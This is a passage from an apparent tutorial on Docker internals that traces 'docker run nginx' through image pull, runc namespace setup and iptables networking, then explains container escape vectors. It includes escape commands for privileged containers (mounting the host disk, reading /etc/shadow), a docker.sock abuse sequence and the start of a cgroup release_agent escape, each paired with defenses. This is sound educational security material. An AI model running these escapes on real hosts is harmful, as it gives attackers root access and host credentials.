&lt;p&gt;Now let's put it all together. When you type &lt;code&gt;docker run -p 8080:80 nginx&lt;/code&gt;, what actually happens? The answer involves &lt;strong&gt;five distinct phases&lt;/strong&gt;, each handled by a different part of the stack.&lt;/p&gt;

&lt;h3&gt;
  
  
  10.1 The Five Phases
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsguktljvsbrzpenikw1a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsguktljvsbrzpenikw1a.png" alt="five phases" width="360" height="2043"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  10.2 Phase-by-Phase Breakdown
&lt;/h3&gt;

&lt;p&gt;Let's trace exactly what each component does.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Phase 1: Image Resolution&lt;/strong&gt; (dockerd → Registry)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;You:     docker run -p 8080:80 nginx
CLI:     Sends REST API call to dockerd
dockerd: "Do I have nginx:latest locally?"
         → Check local image cache
         → Missing! Need to pull from registry

dockerd → Registry:  GET /v2/library/nginx/manifests/latest
Registry → dockerd:  Here's the OCI manifest with 6 layer digests

dockerd: "Which layers do I already have?"
         → Check: sha256:abc123... ✅ (have it - debian base)
         → Check: sha256:def456... ❌ (missing)
         → Check: sha256:789abc... ❌ (missing)

dockerd → Registry:  GET /v2/library/nginx/blobs/sha256:def456...
Registry → dockerd:  [compressed layer tarball]

dockerd: Unpacks layers to /var/lib/docker/overlay2/
         → Verifies SHA-256 checksums
         → Decompresses tarballs
         → Stores in content-addressable storage
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
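&lt;p&gt;The content-addressable step above is worth making concrete: a layer's identity &lt;em&gt;is&lt;/em&gt; the SHA-256 of its bytes, so storing each blob under its own digest gives dockerd deduplication and corruption checks for free. A minimal sketch (temp files stand in for layer tarballs; the store layout is simplified, not Docker's actual on-disk format):&lt;/p&gt;

```shell
# Simulate content-addressable layer storage: each blob is stored at a
# path derived from its own SHA-256, so re-hashing verifies integrity.
store=$(mktemp -d)
layer=$(mktemp)
echo "pretend this is a compressed layer tarball" | tee "$layer"

# The digest that would appear in the OCI manifest
digest=$(sha256sum "$layer" | awk '{print $1}')

# "Pull": copy the blob into the store under its digest
mkdir -p "$store/sha256"
cp "$layer" "$store/sha256/$digest"

# "Verify": re-hash the stored blob; a mismatch means corruption
check=$(sha256sum "$store/sha256/$digest" | awk '{print $1}')
if [ "$digest" = "$check" ]; then echo "layer verified: sha256:$digest"; fi
```

&lt;p&gt;Identical layers pulled by different images hash to the same digest, which is exactly why the trace above can skip blobs it already has.&lt;/p&gt;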



&lt;p&gt;&lt;strong&gt;Phase 2: Container Setup&lt;/strong&gt; (dockerd → containerd)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;dockerd → containerd: "Create a container from nginx:latest"
                      Here's the config: { Image: "nginx", Ports: {"80/tcp": {}} }

containerd: Generates OCI runtime specification (config.json):
            {
              "root": { "path": "/path/to/overlay2/merged" },
              "process": { "args": ["nginx", "-g", "daemon off;"] },
              "linux": {
                "namespaces": [
                  { "type": "pid" }, { "type": "network" }, ...
                ],
                "resources": { "memory": { "limit": -1 } }
              }
            }

containerd: Prepares overlay2 mount:
            - lowerdir: nginx image layers (read-only)
            - upperdir: /var/lib/docker/overlay2/abc123/diff (writable)
            - workdir:  /var/lib/docker/overlay2/abc123/work
            - merged:   /var/lib/docker/overlay2/abc123/merged (what container sees)

containerd → runc: "Create container with this config.json"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
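&lt;p&gt;A real overlay mount needs privileges, but the precedence rule containerd relies on is easy to simulate with plain directories: files in &lt;code&gt;upperdir&lt;/code&gt; shadow same-named files in &lt;code&gt;lowerdir&lt;/code&gt;, and &lt;code&gt;merged&lt;/code&gt; shows the union. A rough sketch (plain &lt;code&gt;cp&lt;/code&gt; standing in for the kernel's overlayfs logic):&lt;/p&gt;

```shell
# Simulate overlay2 precedence without mounting anything:
# merged = union of lower and upper, with upper winning on conflicts.
root=$(mktemp -d)
mkdir -p "$root/lower" "$root/upper" "$root/merged"

echo "from the image layer"  | tee "$root/lower/nginx.conf"
echo "only in the image"     | tee "$root/lower/image-only.txt"
echo "container wrote this"  | tee "$root/upper/nginx.conf"

# Build the merged view: copy lower first, then let upper overwrite
cp -r "$root/lower/." "$root/merged/"
cp -r "$root/upper/." "$root/merged/"

cat "$root/merged/nginx.conf"     # the container's write shadows the image copy
cat "$root/merged/image-only.txt" # untouched image files show through
```

&lt;p&gt;The real filesystem does this lazily at lookup time instead of copying, which is why starting a container doesn't duplicate the image.&lt;/p&gt;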



&lt;p&gt;&lt;strong&gt;Phase 3: Kernel-Level Isolation&lt;/strong&gt; (runc → Linux Kernel)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;runc: Reads config.json
      → Time to talk to the kernel

runc → kernel: clone(CLONE_NEWPID | CLONE_NEWNET | CLONE_NEWNS | 
                     CLONE_NEWUTS | CLONE_NEWIPC | CLONE_NEWCGROUP)
               "Create a new process with isolated namespaces"
               (CLONE_NEWUSER is added only when userns-remap is enabled)

kernel: Creates namespace structures
        → New PID namespace: container's processes start at PID 1
        → New NET namespace: empty network stack
        → New MNT namespace: isolated filesystem view
        → (plus UTS, IPC, and cgroup namespaces)

runc → kernel: Write cgroup limits to /sys/fs/cgroup/
               - cpu.max    = "max 100000"  (no CPU limit requested)
               - memory.max = "max"         (no --memory flag was given)
               - pids.max   = "max"         (unlimited)

runc → kernel: mount("overlay", "/var/lib/docker/overlay2/abc123/merged", ...)
               "Mount the overlay filesystem as the container's root"

runc → kernel: mount("proc", "/proc", "proc")
               mount("sysfs", "/sys", "sysfs")
               "Mount pseudo-filesystems inside container"

runc → kernel: prctl(PR_CAPBSET_DROP, CAP_SYS_ADMIN)   (one call per capability)
               "Drop every capability outside Docker's default allowlist"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
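&lt;p&gt;You can inspect the namespace handles those &lt;code&gt;clone()&lt;/code&gt; flags create from any unprivileged shell: each entry under &lt;code&gt;/proc/self/ns&lt;/code&gt; is a symlink whose inode number identifies the namespace, and two processes share a namespace exactly when the inode numbers match:&lt;/p&gt;

```shell
# Each symlink in /proc/PID/ns names a namespace by inode number.
# clone() with CLONE_NEW* flags gives the child fresh inodes here.
readlink /proc/self/ns/pid
readlink /proc/self/ns/net
readlink /proc/self/ns/mnt

# Two processes spawned from the same shell share all namespaces:
a=$(readlink /proc/self/ns/pid)
b=$(sh -c 'readlink /proc/self/ns/pid')
if [ "$a" = "$b" ]; then echo "same pid namespace"; fi
```

&lt;p&gt;Run the same &lt;code&gt;readlink&lt;/code&gt; inside a container and the inode numbers change; that difference &lt;em&gt;is&lt;/em&gt; the isolation boundary.&lt;/p&gt;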



&lt;p&gt;&lt;strong&gt;Phase 4: Networking&lt;/strong&gt; (dockerd → Linux Kernel)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;dockerd: "Container created, now set up networking"

dockerd → kernel: ip link add veth0 type veth peer name veth1a2b3c
                  "Create a virtual ethernet cable (veth pair)"

dockerd → kernel: ip link set veth1a2b3c master docker0
                  "Plug host-end into the docker0 bridge"

dockerd → kernel: ip link set veth0 netns &amp;lt;container-pid&amp;gt;
                  "Move container-end into container's network namespace"

dockerd → kernel: (inside container namespace)
                  ip link set veth0 name eth0
                  ip addr add 172.17.0.2/16 dev eth0
                  ip link set eth0 up
                  ip route add default via 172.17.0.1
                  "Rename to eth0, then configure IP, gateway, routes"

dockerd → kernel: iptables -t nat -A PREROUTING -p tcp --dport 8080 \
                           -j DNAT --to-destination 172.17.0.2:80
                  "Add port forwarding rule: 8080 → container:80"

dockerd → kernel: iptables -t nat -A POSTROUTING -s 172.17.0.0/16 \
                           ! -o docker0 -j MASQUERADE
                  "Add SNAT rule for outbound traffic"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Phase 5: Process Launch&lt;/strong&gt; (runc → Container)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;runc: Everything is ready - namespaces, cgroups, filesystem, network
      → Time to start the actual application

runc → kernel: execve("/usr/sbin/nginx", ["nginx", "-g", "daemon off;"])
               "Replace this process with nginx"

kernel: Inside the container:
        → PID 1 is now nginx (not init!)
        → Sees only its own process tree
        → Sees only its own network interfaces (eth0 = 172.17.0.2)
        → Sees only its own filesystem (overlayfs merged view)

nginx: Starts listening on 0.0.0.0:80 (inside the container)

nginx → kernel: bind(sockfd, { 0.0.0.0:80 })
kernel: "Bound to port 80 in this network namespace"

runc → containerd: "Container is running, PID 1 active"
containerd → dockerd: "Container abc123 status: running"
dockerd → CLI: { "Id": "abc123...", "Status": "running" }
CLI → You: abc123def456...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
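&lt;p&gt;The crucial property of that &lt;code&gt;execve()&lt;/code&gt; call is that it replaces the process image while keeping the PID, which is how runc's setup process &lt;em&gt;becomes&lt;/em&gt; nginx as PID 1 rather than spawning it as a child. You can observe this with any shell (&lt;code&gt;sh&lt;/code&gt; standing in for nginx):&lt;/p&gt;

```shell
# exec replaces the current process image but keeps the same PID -
# the same mechanism by which runc's final child becomes PID 1.
out=$(sh -c 'echo "before exec: $$"; exec sh -c "echo \"after exec: \$\$\""')
echo "$out"

before=$(echo "$out" | awk '/before/ {print $3}')
after=$(echo "$out" | awk '/after/ {print $3}')
if [ "$before" = "$after" ]; then echo "same PID across exec"; fi
```

&lt;p&gt;Both lines print the same PID: the second &lt;code&gt;sh&lt;/code&gt; is the same process, wearing a new program.&lt;/p&gt;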



&lt;h3&gt;
  
  
  10.3 The Complete Timeline
&lt;/h3&gt;

&lt;p&gt;Here's roughly how fast it all happens (illustrative timings; a real registry pull over the network typically takes seconds, not milliseconds):&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Time&lt;/th&gt;
&lt;th&gt;What's Happening&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;0ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;You press Enter on &lt;code&gt;docker run&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;5ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CLI sends REST call to dockerd&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;10-200ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Phase 1: Image pull (if needed) - can be ~0ms if cached&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;210ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Phase 2: containerd generates config&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;220ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Phase 3: runc creates namespaces &amp;amp; cgroups&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;240ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Phase 4: Network setup (veth, bridge, iptables)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;250ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Phase 5: execve("nginx") - PID 1 starts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;270ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;nginx binds to port 80&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;300ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;nginx is serving traffic&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;~500ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Total time&lt;/strong&gt; (cold start with image pull)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;If the image is already cached, startup drops to &lt;strong&gt;~100ms&lt;/strong&gt;: just the namespace creation and process launch.&lt;/p&gt;

&lt;p&gt;Compare this to a VM:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Boot time: 20-60 seconds&lt;/li&gt;
&lt;li&gt;Memory overhead: 512MB minimum for guest OS&lt;/li&gt;
&lt;li&gt;Disk overhead: Full OS image (1-10GB)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Docker's speed comes from &lt;strong&gt;not booting an OS&lt;/strong&gt;. It's just process isolation with namespace boundaries — the kernel is already running.&lt;/p&gt;




&lt;h2&gt;
  
  
  11. Security Surface and Attack Vectors
&lt;/h2&gt;

&lt;p&gt;Understanding internals means understanding where things can go wrong. The container boundary is enforced by &lt;strong&gt;kernel features&lt;/strong&gt;, not by a hypervisor. This is both Docker's strength (speed, efficiency) and its weakness (shared kernel = shared attack surface).&lt;/p&gt;

&lt;p&gt;Every security discussion about containers comes down to one fundamental question: &lt;strong&gt;What happens if a malicious process inside a container tries to break out?&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  11.1 The Threat Landscape
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff0654w2v5lcpqcbxyx74.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff0654w2v5lcpqcbxyx74.png" alt="threat landscape" width="458" height="2046"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The security model is &lt;strong&gt;defense in depth&lt;/strong&gt; — multiple layers that must all be bypassed for a successful container escape.&lt;/p&gt;

&lt;h3&gt;
  
  
  11.2 Attack Vector 1: Privileged Mode (&lt;code&gt;--privileged&lt;/code&gt;)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What it is:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;--privileged&lt;/span&gt; malicious-image
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What it does:&lt;/strong&gt; Disables or hollows out nearly &lt;em&gt;every security boundary&lt;/em&gt; we've discussed:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;✅ Namespaces still exist - but with full capabilities they are trivial to cross&lt;/li&gt;
&lt;li&gt;✅ cgroups still limit resources - but not access&lt;/li&gt;
&lt;li&gt;❌ All capabilities granted (CAP_SYS_ADMIN, CAP_NET_ADMIN, etc.)&lt;/li&gt;
&lt;li&gt;❌ &lt;code&gt;/dev&lt;/code&gt; is fully exposed (block devices, hardware)&lt;/li&gt;
&lt;li&gt;❌ seccomp disabled&lt;/li&gt;
&lt;li&gt;❌ AppArmor/SELinux disabled&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The attack:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Inside a privileged container&lt;/span&gt;
&lt;span class="nb"&gt;mkdir&lt;/span&gt; /mnt/host
mount /dev/sda1 /mnt/host  &lt;span class="c"&gt;# Mount the host's root filesystem&lt;/span&gt;
&lt;span class="nb"&gt;chroot&lt;/span&gt; /mnt/host           &lt;span class="c"&gt;# Change root to host filesystem&lt;/span&gt;
&lt;span class="c"&gt;# You're now effectively root on the host&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; /etc/shadow            &lt;span class="c"&gt;# Read host passwords&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why it works:&lt;/strong&gt; With &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; and full &lt;code&gt;/dev&lt;/code&gt; access, the attacker can mount the host's block devices and access the entire filesystem. The namespace boundary becomes meaningless.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Defense:&lt;/strong&gt; &lt;strong&gt;Never use &lt;code&gt;--privileged&lt;/code&gt; in production.&lt;/strong&gt; If you need specific capabilities (e.g., &lt;code&gt;CAP_NET_ADMIN&lt;/code&gt; for network tools), grant them individually:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;--cap-add&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;NET_ADMIN &lt;span class="nt"&gt;--cap-drop&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;ALL my-image
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  11.3 Attack Vector 2: Kernel Vulnerabilities (Shared Kernel)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;The fundamental problem:&lt;/strong&gt; All containers share the host's kernel. A kernel exploit in one container = full host compromise.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Real-world example: CVE-2019-5736 (runc escape)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This was a critical vulnerability in &lt;code&gt;runc&lt;/code&gt; itself (a runtime bug rather than a kernel bug, but with the same blast radius: full host compromise). Here's how it worked:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Attacker prepares a malicious container entrypoint&lt;/span&gt;
&lt;span class="c"&gt;# The entrypoint overwrites /proc/self/exe (which points to runc on the host)&lt;/span&gt;

&lt;span class="c"&gt;# When the container starts:&lt;/span&gt;
&lt;span class="c"&gt;# 1. dockerd calls runc to launch the container&lt;/span&gt;
&lt;span class="c"&gt;# 2. runc forks and execs the container's entrypoint&lt;/span&gt;
&lt;span class="c"&gt;# 3. The malicious entrypoint overwrites /proc/self/exe&lt;/span&gt;
&lt;span class="c"&gt;# 4. Because /proc/self/exe is a symlink to the runc binary on the host...&lt;/span&gt;
&lt;span class="c"&gt;# 5. The attacker has now overwritten the host's runc binary&lt;/span&gt;
&lt;span class="c"&gt;# 6. Next time anyone runs 'docker exec', the malicious runc executes on the host&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why it works:&lt;/strong&gt; &lt;code&gt;/proc/self/exe&lt;/code&gt; is a special symlink that points to the currently executing binary. While &lt;code&gt;runc&lt;/code&gt; is launching the entrypoint, that symlink points at the host's &lt;code&gt;/usr/bin/runc&lt;/code&gt;. By opening it from inside the container and writing back through the resulting file descriptor, the attacker could overwrite the host's binary.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Defense mechanisms:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. seccomp profiles&lt;/strong&gt; — Whitelist only the syscalls the container actually needs:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"defaultAction"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"SCMP_ACT_ERRNO"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"syscalls"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"names"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"read"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"write"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"open"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"close"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"stat"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"action"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"SCMP_ACT_ALLOW"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"names"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"mount"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ptrace"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"reboot"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"action"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"SCMP_ACT_ERRNO"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Docker's default seccomp profile blocks ~44 dangerous syscalls including:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;mount&lt;/code&gt; / &lt;code&gt;umount&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;reboot&lt;/code&gt; / &lt;code&gt;sethostname&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;ptrace&lt;/code&gt; (process tracing)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;keyctl&lt;/code&gt; (kernel key management)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;2. Keep kernel &amp;amp; runtime updated:&lt;/strong&gt; CVE-2019-5736 was patched in runc 1.0-rc7: runc now re-executes itself from a sealed, in-memory copy of its own binary (via &lt;code&gt;memfd_create&lt;/code&gt;), so the host binary can no longer be reached through &lt;code&gt;/proc/self/exe&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  11.4 Attack Vector 3: Mounted Docker Socket
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What it is:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;-v&lt;/span&gt; /var/run/docker.sock:/var/run/docker.sock attacker-image
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What it does:&lt;/strong&gt; Gives the container &lt;strong&gt;full control over the Docker daemon&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The attack:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Inside the container with the socket mounted&lt;/span&gt;
apk add docker-cli  &lt;span class="c"&gt;# Install Docker CLI inside container&lt;/span&gt;

&lt;span class="c"&gt;# Now the attacker can create their own privileged container&lt;/span&gt;
docker run &lt;span class="nt"&gt;-v&lt;/span&gt; /:/host &lt;span class="nt"&gt;--privileged&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; alpine sh

&lt;span class="c"&gt;# This new container has:&lt;/span&gt;
&lt;span class="c"&gt;# - Full access to host filesystem (mounted at /host)&lt;/span&gt;
&lt;span class="c"&gt;# - --privileged mode (all capabilities)&lt;/span&gt;
&lt;span class="c"&gt;# - Running as root on the host&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why it works:&lt;/strong&gt; The Docker socket is the control plane. Anyone who can write to &lt;code&gt;/var/run/docker.sock&lt;/code&gt; can instruct the daemon to create containers with arbitrary configurations — including privileged containers, bind mounts of the host filesystem, and more.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Defense:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Never mount the Docker socket into untrusted containers&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;If a tool legitimately needs the API (e.g., management UIs like Portainer or proxies like Traefik), use &lt;strong&gt;socket proxies&lt;/strong&gt; that filter allowed API calls:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;  &lt;span class="c"&gt;# Use tecnativa/docker-socket-proxy to restrict allowed operations&lt;/span&gt;
  docker run &lt;span class="nt"&gt;-v&lt;/span&gt; /var/run/docker.sock:/var/run/docker.sock &lt;span class="se"&gt;\&lt;/span&gt;
             &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;CONTAINERS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1 &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;POST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0 &lt;span class="se"&gt;\&lt;/span&gt;
             tecnativa/docker-socket-proxy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  11.5 Attack Vector 4: Dangerous Capabilities
&lt;/h3&gt;

&lt;p&gt;Linux capabilities break root's powers down into ~40 distinct privileges. By default, Docker drops most of them, but some workloads need specific capabilities added back.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dangerous capabilities:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CAP_SYS_ADMIN&lt;/strong&gt; — The "god mode" capability. Allows:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Mounting filesystems&lt;/li&gt;
&lt;li&gt;Creating namespaces&lt;/li&gt;
&lt;li&gt;Loading kernel modules&lt;/li&gt;
&lt;li&gt;Basically everything that defines "root"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Attack with CAP_SYS_ADMIN:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Container started with --cap-add=SYS_ADMIN&lt;/span&gt;
&lt;span class="nb"&gt;mkdir&lt;/span&gt; /mnt/cgroup
mount &lt;span class="nt"&gt;-t&lt;/span&gt; cgroup &lt;span class="nt"&gt;-o&lt;/span&gt; memory memory /mnt/cgroup
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$$&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /mnt/cgroup/release_agent  &lt;span class="c"&gt;# Escape via cgroup release_agent&lt;/span&gt;
